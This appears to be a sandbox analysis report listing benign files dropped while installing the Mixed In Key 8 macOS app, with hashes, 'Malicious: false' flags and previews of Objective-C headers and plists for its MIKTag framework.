/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_XwDZAP Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	1800
Entropy (8bit):	5.174834473064728
Encrypted:	false
SSDEEP:	48:CC1pSX4BossRIQUQt/ueVEEhKXIIe+k8h0DMCqfNAt:CMplsp5TK4+MqV0
MD5:	1D15D95F32C1CB1654C3B489F39B69B0
SHA1:	901624CF70215E2E63DA5E7791606422F136B794
SHA-256:	F138E5ED8FE99815552CCD89A60566C4C58D591B3598D906A99606184FC64379
SHA-512:	B938D54F9F57F02BDD151632601F7F49C9B2E18F21E69F1744539A1093E9C77FB6C5352AAD0F82B204E0A3325E73D8DF2188F55C270D2DBD36031CAF0A0E11E9
Malicious:	false
Preview:	//.// MIKRekordboxDatabase.h.// MixedInKey.//.// Created by Andrew Madsen on 10/7/14..// Copyright (c) 2014 Mixed In Key LLC. All rights reserved..//..#import <Foundation/Foundation.h>.#import <MIKTag/MIKRekordboxTrack.h>.#import <MIKTag/MIKRekordboxCuePoint.h>..@class MIKRekordboxPlaylistFolder;..extern NSString const MIKRekordboxFileFolderSandboxedBookmarkDataKey;../. This class is used to read from and write to a Rekordbox XML database file.. * It is used by Mixed In Key to save cue point information generated during. * MIK analysis to Rekordbox.. /..@interface MIKRekordboxDatabase : NSObject..@property (nonatomic, strong, readonly) NSArray<MIKRekordboxTrack > tracks;.@property (nonatomic, strong, readonly) MIKRekordboxPlaylistFolder playlist;.@property (nonatomic, assign, getter=isRekordboxDBLoaded) BOOL rekordboxDBLoaded;.@property (nonatomic, readonly) NSDate *fileModificationDate;.@property (nonatomic, readonly) BOOL needsReloading;..+ (instancetype)sharedDatabas

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_bGJjrz Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	596
Entropy (8bit):	4.956889755651704
Encrypted:	false
SSDEEP:	12:++u2cXrouQUWIUcRZOU2gquzJtHMg7SACHiAm0enNq5e:dA0uQPItkU2ruzL7Wenc0
MD5:	5D6C27DBB3438E7A6AF03220BB5F1930
SHA1:	B304ED02B0FA22B777A5DDBE7D6CA43F5FF8F4EE
SHA-256:	CBCF26A24D7A34CA42C60DE856F6C8484A8A97E21D7068CB1E5EC100710473C0
SHA-512:	DB4971985828624A828026275C8BF72E367D155BD7D9D1D5052B326ADE89EDBCBFBF7B2FC0EC6C3258FC7AD19AEA9A26797325DC3D7BB0B000A6A17875254489
Malicious:	false
Preview:	//.// MIKTagWAV.h.// MixedInKey.//.// Created by Patrick Machielse on 24-08-11..// Copyright 2011 Mixed In Key LLC. All rights reserved..//..#import "MIKTagID3.h"../!..@header..MIKTagWAV..@abstract Support for tags in wav files..@discussion This class reads / writes ID3v2 tags which can be stored in a RIFF chunk......If no ID3 tag is found we try to read artist, title, and comment from.....the native wav tags. There is no write support for native tags, updating.....the tag always creates an embedded ID3 tag and will not touch native tags.. /..@interface MIKTagWAV : MIKTagID3..@end.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_cZ1qQK Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	697
Entropy (8bit):	5.055428834085401
Encrypted:	false
SSDEEP:	12:yImpNGbAUwAXFq2oovJKZjxFKjdijd6gq+6Jt/teFq0lGgpJJXiw:7mpC1bmy4ZNIZiZ6gq+6Jt/tOq4GgdSw
MD5:	DBB5B31F6192FAD739F473DD1E4D8020
SHA1:	0F00D479EC7F68D1D186ED30832B0FBA5E8B9B46
SHA-256:	A52C0B107A27FA81DB1CC2756DBB1B726FBBC951468C21F787E7F58CC989A24F
SHA-512:	019473E2C94CA04DBCF425C2D7B6725906F358B6EB78E647A66D2D1FEBEDCEF9D8E63874B79D67EADE4DE7105BCEE1BE117CF02A5A503AD46603FDF477578D77
Malicious:	false
Preview:	//.// MIKTagErrors.h.// MIKTag.//.// Created by Andrew Madsen on 10/21/14..// Copyright (c) 2014 mixedinkey.com. All rights reserved..//..#import <Foundation/Foundation.h>..extern NSString * const MIKTagErrorDomain;..typedef NS_ENUM(NSInteger, MIKTagErrorCode) {..MIKTagSaveError = 1,....MIKTagTraktorIsRunningError = 1000,..MIKTagSeratoIsRunningError,..MIKTagRekordboxIsRunningError,..MIKTagTraktorDatabaseFileReadError,..MIKTagTraktorDatabaseFileWriteError,..MIKTagRekordboxDatabaseFileWriteError,..MIKTagSandboxError,. MIKTagRekordboxDatabaseFileReadError.};..// User Info keys../*. The MIKTag instance that generated the error.. /.extern NSString const MIKTagErrorFailingTagKey;.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_kgTgNM Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, UTF-8 Unicode text
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	5.024932221538651
Encrypted:	false
SSDEEP:	48:pm2Ev/17hOdDnyydblTxOdwzFUdOGjsP3IRjGuNOJQSEvQs+vkF+40Vy2jufnW:pmV970hGu3SNZYs+aYUnfW
MD5:	07C338F2C4E652A80B4E16F5A903EF37
SHA1:	485CAF635544F1E317563428D5F5722C194D6905
SHA-256:	AE7D26E4AF42F86C09AAF6BE0B441514975ED17E88CCA50AC57ED71DCCBB384F
SHA-512:	AF5DB31526DB25E8339505798AF368F483458C88913A2375CB6F94C23CD1ED3E951D7AD656B166BB18D22D7884D31A7A71C6BA407419B608B54B513E9119A1B1
Malicious:	false
Preview:	//.// MIKRekordboxQueue.h.// MIKTag.//.// Created by patrickm on 19-11-15..// Copyright . 2015 mixedinkey.com. All rights reserved..//..#import <Foundation/Foundation.h>..// notifications.extern NSString * _Nonnull const MIKRekordboxQueueProgressChangedNotification;..//.equivalent to: MIKTagCompletionBlock.typedef void (^MIKRekordboxQueueCompletionBlock)(BOOL success, NSError * _Nullable error);..typedef NS_ENUM(NSInteger, MIKRekordboxCuePointExportStage) {. MIKRekordboxCuePointExportStageIdle = 0,. MIKRekordboxCuePointExportStagePending,. MIKRekordboxCuePointExportStageLoading,. MIKRekordboxCuePointExportStageUpdating,. MIKRekordboxCuePointExportStageSaving.};..typedef struct {. MIKRekordboxCuePointExportStage.stage;...//.export stage. NSUInteger......count;...//.current progress. NSUInteger......total;...//.total # of items.} MIKRekordboxCuePointExportProgress;.../*. MIKRekordboxQueue is used to schedule updates to the Rekordbox XML databas

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_omhIP8 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	971
Entropy (8bit):	5.1302536389002995
Encrypted:	false
SSDEEP:	12:qmpeGbAUUNNXTVX/AiqTQlskLvQ8vYCYgsWTkb+owd+WOw7sLwzT7FNL28:qmpR16XTVXNmWYLWj7qcTfL
MD5:	4A82AE19E2FE04D8FABB5B27DDF86B98
SHA1:	7AACB9CE21F37CCD6F81CDCF707A35F7745F108C
SHA-256:	27497080EB19588B25D10E4EED4EA2EDB096E23208353ADC6A91F39AEA338393
SHA-512:	0DB26746BF378D2A41590AA9A91DC3414B55D6CAA6E6392AAA673E510337EE91AC316B258BF260A7D066EE380393FDBC89561AD94D160BF99BB8E4F1A9F72D2C
Malicious:	false
Preview:	//.// MIKTraktorTrack.h.// MIKTag.//.// Created by Andrew Madsen on 10/8/14..// Copyright (c) 2014 mixedinkey.com. All rights reserved..//..#import <Foundation/Foundation.h>...@class MIKTraktorDatabase;.@class MIKTraktorCuePoint;..@interface MIKTraktorTrack : NSObject..@property (nonatomic, copy, readonly) NSString uniqueID;.@property (nonatomic, strong, readonly) NSString path;.@property (nonatomic, readonly) NSString filename;.@property (nonatomic, strong, readonly) NSArray cues;.@property (nonatomic, readonly) NSDate modificationDate;.@property (nonatomic, readonly) NSArray beatTimes;..@property (nonatomic, readonly) NSString decomposedStringWithCanonicalMapping; / optimization /..- (void)addCuesObject:(MIKTraktorCuePoint )cue;.- (void)insertObject:(MIKTraktorCuePoint )cue inCuesAtIndex:(NSUInteger)index;.- (void)removeCuesObject:(MIKTraktorCuePoint )cue;.- (void)removeObjectFromCuesAtIndex:(NSUInteger)index;.- (void)removeAllCues;..@end.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_pxF21X Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	2498
Entropy (8bit):	5.114819980241135
Encrypted:	false
SSDEEP:	48:nm2q14Q26BnOcIQOHPMH1lHPMA1lVDIS0fP5PMXLbPMf7XvPMYM:nmV4Hg/rnD
MD5:	AB57C8A471AD4610E9CEC8A5696E4683
SHA1:	863B60827DA07F11937C80A7C55E99AB8413E6BC
SHA-256:	01394F20585598D2CFD8C207EE0D7DBDA779A69066064F1FAC0D11AD5A250D61
SHA-512:	69B9A90F2444093633EA34ECD14F209EA1B9D87457A83A2A110C4CEC75CA9BFA9732AD8A60280A98D399B237A94C34004DE23208F131F98F65A9D86B62DAB4E4
Malicious:	false
Preview:	//.// MIKTagCopying.h.// MIKTag.//.// Created by patrickm on 28-09-12..// Copyright (c) 2012 mixedinkey.com. All rights reserved..//..#import <Foundation/Foundation.h>.../!..@header..MIKTagUtil..@abstract Utility functions for working with m4a and id3 tags...@discussion TagLib is used to handle m4a tags as well. CoreAudio still.....doesn't support m4a at all in 10.6. Quicktime might, but the.....code is very arcane and will become obsolete.. /../!..@function.PNCopyID3Tag..@abstract Copy ID3 tag from source file to destination...@param sourcePath Path of the source file...@param destPath Path of the receiving file...@result YES if a tag was copied, NO otherwise.. /.FOUNDATION_EXPORT BOOL MIKCopyTagID3(NSString sourcePath, NSString destPath);../*!..@function.MIKCopyTagMP42ID3..@abstract Copy MP4 tag from source file to destination...@param sourcePath Path of the source file...@param destPath Path of the receiving file...@result YES if a tag was

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_rxlUPG Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	1016
Entropy (8bit):	5.12901403890537
Encrypted:	false
SSDEEP:	12:ZPmpeGbAU+VnxVbWmgAZsWEXe3+1RUQlrUEi9Ii9GICRK5W:ZPmpR1InLE0kOt9qR+W
MD5:	6AE6B70B50AFEB3FD80F6851EBA2DF5C
SHA1:	6B05DDEE651D487932EF36A9D888C17AB4427F3A
SHA-256:	EF64DD7ECB7BC02078F3D0A8BBB2A9225B0EE10E43C8625040078A00918970EF
SHA-512:	0D97D404D9A53D8F85EB63542B104A93F0FD47696CFFC81A9B63B4E98C05A9D6E5A300A69CC7C6C154A144B3F2620075AC7B52C2869377087C4E9A87728EB2C1
Malicious:	false
Preview:	//.// MIKRekordboxCuePoint.h.// MIKTag.//.// Created by Andrew Madsen on 10/8/14..// Copyright (c) 2014 mixedinkey.com. All rights reserved..//..#import <Foundation/Foundation.h>..typedef NS_ENUM(NSInteger, MIKRekordboxCuePointType) {..MIKRekordboxCuePointTypeCue.. = 0,..MIKRekordboxCuePointTypeFadeIn,..MIKRekordboxCuePointTypeFadeOut,..MIKRekordboxCuePointTypeLoad,..MIKRekordboxCuePointTypeLoop.};..@class MIKRekordboxTrack;.@class MIKTagCuePoint;..@interface MIKRekordboxCuePoint : NSObject <NSCopying>..+ (instancetype)rekordboxCueWithCuePoint:(MIKTagCuePoint )cuePoint atIndex:(NSInteger)index;..@property (nonatomic, strong, readonly) NSString name;.@property (nonatomic, readonly) MIKRekordboxCuePointType type;.@property (nonatomic, readonly) NSTimeInterval start; // in seconds.@property (nonatomic, readonly) NSTimeInterval end; // in seconds.@property (nonatomic, readonly) NSInteger num; // 0-7. Position index in the 8 hot cues that Rekordbox can store. -1 = Me

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_uePoHY Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, UTF-8 Unicode text
Category:	dropped
Size (bytes):	2517
Entropy (8bit):	5.154906345688996
Encrypted:	false
SSDEEP:	48:ym2RSm1U4WcL6izWePihiSPzQ2ef2ircnzJbawUeHawUi84OQuqzutuzPF/ebF/E:ymeSwU4LXq9iG1bhbVEqeuzAcl
MD5:	5C5CCCD5BA6D5C05926988C6B9FC8587
SHA1:	0933C60C7AFDAD188FFE1C0FD69D5ACB01166EDD
SHA-256:	5E1BD2BC7501D039B4B593864681BBCB18D5FF537B698A7A0C0D0BF3451E6B75
SHA-512:	47799430AA67C4D025A62B2BDE83EBBD09610AF0FFEC4E0068AC67585E03AFBA460C2F9C1A9D3FC9B1855AF8AA854044A88E23EEBC1C12E552D14F9ADF00A256
Malicious:	false
Preview:	//.// MIKTagCustomProperties.h.// MIKTag.//.// Created by patrickm on 02-05-17..// Copyright . 2017 mixedinkey.com. All rights reserved..//..#import <Foundation/Foundation.h>.#import <MIKTag/MIKTagCuePoint.h>...@interface NSData (MIKTagData).@property (nonatomic, readonly) NSDictionary JSONDict;.@end..#pragma mark -..@interface NSDictionary (MIKTagData).@property (nonatomic, readonly) NSData tagData;.@end..#pragma mark -..@interface MIKTagCustomProperty : NSObject.+ (instancetype)propertyWithJSONDict:(NSDictionary )jsonDict;.- (instancetype)initWithJSONDict:(NSDictionary )jsonDict;.- (BOOL)isEqualToTagProperty:(MIKTagCustomProperty )other;..@property (class, readonly) NSString algorithmKey;.@property (class) NSInteger algorithmVersion;..@property (nonatomic, readonly) NSDictionary JSONDict;.@property (nonatomic, readonly) NSString source;.@property (nonatomic) NSInteger algorithm;.@end..#pragma mark -..@interface MIKTagKey : MIKTagCustomProperty..+ (instancetype)keyWithKey

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_xdO1HF Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, UTF-8 Unicode text
Category:	dropped
Size (bytes):	2685
Entropy (8bit):	4.9681700633831305
Encrypted:	false
SSDEEP:	48:im2Ev/17VzdanffdSMTxzdtzAUaPaGjsPGIRjGuN3JNSE9TIQs+aBkFwM40Vy2j3:imV977uGuGSNX9ds+aofUOfCU
MD5:	CF8A2FC905E6CB2C33CD47B42CD1F8DE
SHA1:	E66340BE42CD560EFA4DB423337EFF163CB4CC64
SHA-256:	183DCD20064A807D350759A62438AFC1C8AACA630FE67AE664B184F122D255DF
SHA-512:	D28B6C8470972D503AAE10E958B22526DA44272B01C27D95E22A70DC610512FBB96FC68D12F8C71A70EA375ECEBCC7854B58BBB26B1C465BB98C294DD94D7BFB
Malicious:	false
Preview:	//.// MIKTraktorQueue.h.// MIKTag.//.// Created by patrickm on 19-11-15..// Copyright . 2015 mixedinkey.com. All rights reserved..//..#import <Foundation/Foundation.h>..// notifications.extern NSString * _Nonnull const MIKTraktorQueueProgressChangedNotification;..//.equivalent to: MIKTagCompletionBlock.typedef void (^MIKTraktorQueueCompletionBlock)(BOOL success, NSError * _Nullable error);..typedef NS_ENUM(NSInteger, MIKTraktorCuePointExportStage) {. MIKTraktorCuePointExportStageIdle = 0,. MIKTraktorCuePointExportStagePending,. MIKTraktorCuePointExportStageLoading,. MIKTraktorCuePointExportStageUpdating,. MIKTraktorCuePointExportStageSaving.};..typedef struct {. MIKTraktorCuePointExportStage.stage;...//.export stage. NSUInteger ....count; // .current progress [unused]. NSUInteger.... total; //.total # of items [unused].} MIKTraktorCuePointExportProgress;.../*. MIKTraktorQueue is used to schedule updates to the

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_xnUU2w Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	5973
Entropy (8bit):	5.239207130854761
Encrypted:	false
SSDEEP:	96:QdB4PfZymqIcfnc0R1cRghMQAIbgPPZ1bofRIq249GpkLJOh:QqDHsTR1c2rTWZ1bofRIq249GpMu
MD5:	AF248B3E06FD13C764DFE0AC742D27E7
SHA1:	B4061D7895E30D89A26E8BC7139096AA83B5C93A
SHA-256:	BF54B126C011C90E16B97E250C5D7334EDEAC2549E73F6595B157725091B64C8
SHA-512:	E58066D63532B77A445485BBB7FAFD77774CBC8E332CE2B99F7E44D96766E9C692CDE8479C2B0B882667D4E396184D3B2319A886836C8C3988B5733D1C84FEE4
Malicious:	false
Preview:	//.// MIKTag.h.// MixedInKey.//.// Created by patrickm on 21-01-10..// Copyright 2010 Mixed In Key LLC. All rights reserved..//..#import <Foundation/Foundation.h>.#import "MIKTagCustomProperties.h".#import "MIKTagErrors.h"..NS_ASSUME_NONNULL_BEGIN../!..@header..MIKTag..@abstract .Abstract class offering ID3 and MP4 tag support...@discussion.Tag handling based on TagLib. Only a minimal wrapper......For writing use init/release because changes are only.....fflushed when the underlying tfile(s) are destroyed.. /..//.Tags implemented using TagLib 1.10+.//.http://developer.kde.org/~wheeler/taglib/api/.//..//.type for block based save API.typedef void (^MIKTagCompletionBlock)(BOOL success, NSError * _Nullable error);...//Keys for accessing the returned NSDictionaries in the -(NSArray )images method.extern NSString const MIKTagImageDictionaryImageKey;.extern NSString * const MIKTagImageDictionaryImageTypeKey;..@class MIKTagComment;.@class MIKTagSeratoCuePoint;.@class MIKTagTraktorCu

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Modules/.BC.T_0LBiwW Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	ASCII text
Category:	dropped
Size (bytes):	335
Entropy (8bit):	4.783634044835696
Encrypted:	false
SSDEEP:	6:MX3ltXkIxhUfXpCD4jH/lSwIqmIZE4lNmIZEgmIWX33NmIWXXHmIWXzCke:KlkI7QCD4z/7IVIZTlNmIZ8IGNmI5IR
MD5:	52AC089A106B5BE3907F40AFF4EC65B0
SHA1:	FEC282A467EC18B3DD3F40AF4E84B26D68CEB034
SHA-256:	60282CD995DAF53973003B9282C0E15EEFF3E81A4F13F7D0551A96E1CCEC3575
SHA-512:	D50575D278455C0528FC830BA16F36192E84F1B34241E66FE8B49F0633CF852ECF822F3B05ACB4C9DA8658613A0C0D4F9A0662266A06B2FC3B4EDA70DD677F2A
Malicious:	false
Preview:	framework module MIKTag {..umbrella header "MIKTagHeader.h"....export ..module { export * }....explicit module MIKTagCuePoints {...header "MIKTagCuePoint.h"...header "MIKTraktorDatabase.h"...header "MIKTraktorTrack.h"...header "MIKRekordboxDatabase.h"...header "MIKRekordboxTrack.h"...header "MIKRekordboxCuePoint.h"...export *..}.}

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Resources/.BC.T_mNJC46 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	XML 1.0 document, UTF-8 Unicode text
Category:	dropped
Size (bytes):	1335
Entropy (8bit):	5.222563360956588
Encrypted:	false
SSDEEP:	24:2dfyiwBVw6N/3yMa6i42Rw0gp/sH2PgCGexwMZhGt0G+h:cfyfVt/3ycijO0giH2ICGcwcGt0G+h
MD5:	3622A6B00BCFDBDA81C4A875C9847721
SHA1:	3A154AAD16DA9969CFCC826439F14CAFA0B43A7D
SHA-256:	ADB6C84D716370230D1FB4EB759902DBFB1F8CEAFE37C9D8D0AD090CB72B2DC3
SHA-512:	AB31B4F76430135E6FC08523D80A9FF55E56C50B393EF788C58D597860B4860D8A68F4E05E997BC760AA327DDB54019A3B72122F2957F96913D0EBB64A0CBE22
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>BuildMachineOSBuild</key>..<string>18G95</string>..<key>CFBundleDevelopmentRegion</key>..<string>English</string>..<key>CFBundleExecutable</key>..<string>MIKTag</string>..<key>CFBundleIdentifier</key>..<string>com.mixedinkey.MIKTag</string>..<key>CFBundleInfoDictionaryVersion</key>..<string>6.0</string>..<key>CFBundleName</key>..<string>MIKTag</string>..<key>CFBundlePackageType</key>..<string>FMWK</string>..<key>CFBundleShortVersionString</key>..<string>1.0</string>..<key>CFBundleSignature</key>..<string>????</string>..<key>CFBundleSupportedPlatforms</key>..<array>...<string>MacOSX</string>..</array>..<key>CFBundleVersion</key>..<string>1</string>..<key>DTCompiler</key>..<string>com.apple.compilers.llvm.clang.1_0</string>..<key>DTPlatformBuild</key>..<string>9F2000</string>..<key>DTPlatformVersion</key>..<string

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Resources/en.lproj/.BC.T_zWi5Y4 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text
Category:	dropped
Size (bytes):	92
Entropy (8bit):	3.2610300066712608
Encrypted:	false
SSDEEP:	3:Qwh+yEilSlJlqXMLLkFlVlRDBWjUoFY9n:QpXioJqcLwVlRNWwou9n
MD5:	51EF59B60E5B41B91519CC662A9FE886
SHA1:	3222CA0C39EB50AAF8126BAF852E55430C4718AF
SHA-256:	39CF2EE07B7B333E7C179D0BF4D798A5B72AF6A4E584F51E642703BBFA4FC828
SHA-512:	3952A908B72D44040F5072F6344F6327FC78981C3AA55E931ACAE84C0C9BCC0D148991CD564AF4803765C328CBF5F7EFE9EB558FC56E47E8206B7B706026F30A
Malicious:	false
Preview:	../.. .L.o.c.a.l.i.z.e.d. .v.e.r.s.i.o.n.s. .o.f. .I.n.f.o...p.l.i.s.t. .k.e.y.s. ../.....

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/_CodeSignature/.BC.T_bhlGta Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	8382
Entropy (8bit):	5.295330846030553
Encrypted:	false
SSDEEP:	96:CyWuce8WnE+RmaZeet5CgaGrgDkZbJGxR2HiYG6M1xWJi9BCvqbMiMuANCdcTIk3:XoBHEAf8FBOW/NkEDzko
MD5:	7A9DC9AA18B4E8DFF8E8E672857CC65D
SHA1:	B7547BDC98F6461B6EB75E3CA13554F01710B4EC
SHA-256:	B1300E9F81DEBD5668D974D238E81273FD94A97349FC675CD3AE6D23F1D9AD6C
SHA-512:	7FF15B4C9379A25849624C47C2AD72C92D4146F07BF2BE71B86FB78CE8A1A48D02892F19517F1956EBB4035DB8CCF90F544F356938E670FE01EE2361DC25E41D
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>files</key>..<dict>...<key>Resources/Info.plist</key>...<data>...OhVKrRbamWnPzIJkOfFMr6C0On0=...</data>...<key>Resources/en.lproj/InfoPlist.strings</key>...<dict>....<key>hash</key>....<data>....MiLKDDnrUKr4EmuvhS5VQwxHGK8=....</data>....<key>optional</key>....<true/>...</dict>..</dict>..<key>files2</key>..<dict>...<key>Frameworks/TagLib.framework</key>...<dict>....<key>cdhash</key>....<data>....S5Lb0cMv0RQ/9A5KFfnBPs7Zi/w=....</data>....<key>requirement</key>....<string>identifier "com.mixedinkey.TagLib" and anchor apple generic and certificate 1[field.1.2.840.113635.100.6.2.6] /* exists / and certificate leaf[field.1.2.840.113635.100.6.1.13] / exists */ and certificate leaf[subject.OU] = T4A2E2DEM7</string>...</dict>...<key>Headers/MIKRekordboxCuePoint.h</key>...<dict>....<key>hash</key>....<data>....awXd7mU

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/.BC.T_Wq6vpD Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Mach-O 64-bit x86_64 dynamically linked shared library, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL\|NO_REEXPORTED_DYLIBS>
Category:	dropped
Size (bytes):	356560
Entropy (8bit):	5.846324723041686
Encrypted:	false
SSDEEP:	6144:x8fzCs5HGjTzpjW+Hr2upcHgpdyGHHhmaV:xEZmjjPWCyGHH8a
MD5:	3C4E991D03EF386689F22F1F1F49F27E
SHA1:	DFDDC8B33276E69FC2DF94D050327751C8FF898A
SHA-256:	0FA6771E5EFA88CD48DB58122684FC1BEDE8ECA057EB0BE675F2A3486D29BD2D
SHA-512:	74AC4E4253DD46259F19BDCB70B09E0DC256AF19CCA03D0BF0973D881AD37AB48BE363EC4F9BF5501F86C09E238F37A6BE6B0EB89CB2ABA938C9E48ADFD5782C
Malicious:	false
Preview:	....................@...............h...__TEXT..........................................................__text..........__TEXT..................9.......................................__stubs.........__TEXT..........F...............F...............................__stub_helper...__TEXT..........(...............(...............................__cstring.......__TEXT..................A-......................................__objc_methname.__TEXT..........G@......PW......G@..............................__objc_classname__TEXT..........................................................__objc_methtype.__TEXT..........................................................__const.........__TEXT..........P...............P...............................__gcc_except_tab__TEXT..........8.......<.......8...............................__unwind_info...__TEXT..........t...............t...................................8...__DATA..........................................................__nl_symbol_ptr.__DATA..

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/.BC.T_PlN035 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	PNG image data, 12 x 12, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	318
Entropy (8bit):	6.64053974597311
Encrypted:	false
SSDEEP:	6:6v/lhPIcE/6Tbo7jlgNcRkHKTxaD3YBGn9ngsf5j5cwybeUrw3IIYCbpk6WCp1g+:6v/7DE/6TbsDCHGxO3CG9gsfEL9lupks
MD5:	100146DB670B166E10A259A4773AB990
SHA1:	F91DFD9E3426440A3227CB9DFD1F763672979285
SHA-256:	7A196D759C0B5572BA1962D3086481289FFDF3988D391A025D649187950F269F
SHA-512:	BE599BFE084056D6D69BE5FC654B16AF5DE0AA5FBCBDC0323F9844502A64F7DDE0007CEA030B3F0727C58BFDA097E1A42F26052C7233ADBB2714D18AE8A5381D
Malicious:	false
